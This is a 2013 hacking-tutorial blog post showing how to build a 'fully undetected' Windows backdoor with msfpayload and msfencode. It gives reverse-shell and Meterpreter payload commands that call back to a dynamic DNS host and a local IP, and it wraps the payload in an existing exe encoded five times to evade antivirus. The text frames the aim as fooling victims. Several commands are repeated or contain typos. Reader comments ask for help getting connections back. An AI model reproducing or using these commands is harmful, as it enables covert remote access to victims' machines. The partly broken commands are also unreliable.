Sunday, February 10, 2013

FUD backdoor with msfencode

msfpayload windows/shell_reverse_tcp LHOST=firlezza.no-ip.biz LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t raw a- x86 -b '\x00\x0a\x0d' -c 5





In the previous article, we have seen how to create a simple backdoor.exe for exploiting windows machines simple backdoor. However that simple backdoor is easily caught by any antivirus program, you can't rely after all on a stupid victim who is not running an antivirus program on his machine, because you know that it is very rare. 
Well, metasploit has the necessary tools for crypting your backdoor to avoid detection. Let's see first our chances to bypass an antivirus program without encryption:



backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting




Here is another scan:




backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting




As you can see, we have a little chance to have a successful exploitation of a remote victim.


Let's see what available options does metasploit offer to us:



root@shinobi:~# msfencode -h



backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting





Let's see what available encoders do we have: 

root@shinobi:~# msfenode -l



backtrack, backtrack 5, linux, hacking, tutorial, hacking tutorial, ethical hacking, pentest, penetration testing, pc, wpa, wpa2, metasploit, nmap, browser exploit, information gathering, footprinting




As you may notice, the "shikata_ga_nai" is referred to as the best encoder in "msfencode",we are going to use it to encode our backdoor.

Let's create our backdoor:

root@shinobi:~# msfpayload windows/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw -a x86 -b '\x00\x0a\x0d' -c 5  -x /root/Desktop/pw.exe -o /root/Desktop/pwn.exe




msfpayload windows/shell_reverse_tcp LHOST=firlezza.no-ip.biz LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t raw a- x86 -b '\x00\x0a\x0d' -c 5


With the above command, we enoded our backdoor 5 times with the "shikata_ga_nai" encoder and we exluded any recurrence of this code from our backdoor signature (\x00\x0a\x0d), then we exported the generated exe file to our desktop. Let's our chances now of fooling a given victim with online virus scanners..


msfpayload windows/shell_reverse_tcp LHOST=firlezza.no-ip.biz LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t raw a- x86 -b '\x00\x0a\x0d' -c 5







msfpayload windows/shell_reverse_tcp LHOST=firlezza.no-ip.biz LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t raw a- x86 -b '\x00\x0a\x0d' -c 5




As you can see !!!! the backdoor is totally FUD (fully undetected) !!!!

2 comments:

  1. Thanks but it didn't gives the connection back.
    i am using windows xp sp3 it didn't give back the connection how should i do please help me....

    thanks.

    need your help.

    ReplyDelete
  2. Il file .exe in realtae un file raw inutilizzabile sapresti spiegare come renderlo utilizzabile in modo da farlo eseguire su windows .

    ReplyDelete